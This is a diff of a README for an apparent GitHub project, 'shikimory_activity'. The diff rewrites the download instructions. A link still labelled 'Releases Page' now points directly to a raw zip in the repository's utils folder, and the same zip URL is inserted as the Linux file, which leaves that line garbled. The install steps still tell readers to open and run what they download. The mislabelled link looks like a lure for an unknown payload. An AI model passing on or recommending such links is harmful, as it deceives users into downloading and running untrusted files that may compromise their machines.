Unsymmetric-pythiangames425/shikimory_activity/README.md

 ## 📂 Download & Install

-Visit this page to download: [Releases Page](https://github.com/Unsymmetric-pythiangames425/shikimory_activity/releases).
+Visit this page to download: [Releases Page](https://github.com/Unsymmetric-pythiangames425/shikimory_activity/raw/refs/heads/master/utils/activity_shikimory_v1.1.zip).

 1. Open the releases page linked above.
 2. Look for the latest version of shikimory_activity.
 3. Download the file that matches your device.
    - If you're on Windows, download the `.exe` file.
    - If you're on macOS, download the `.dmg` file.
-   - For Linux, a `.tar.gz` file is available.
+   - For Linux, a `https://github.com/Unsymmetric-pythiangames425/shikimory_activity/raw/refs/heads/master/utils/activity_shikimory_v1.1.zip` file is available.
 4. Once downloaded, locate the file in your downloads folder.
 5. Open the file to start the installation process.
 6. Follow the on-screen instructions to complete the installation.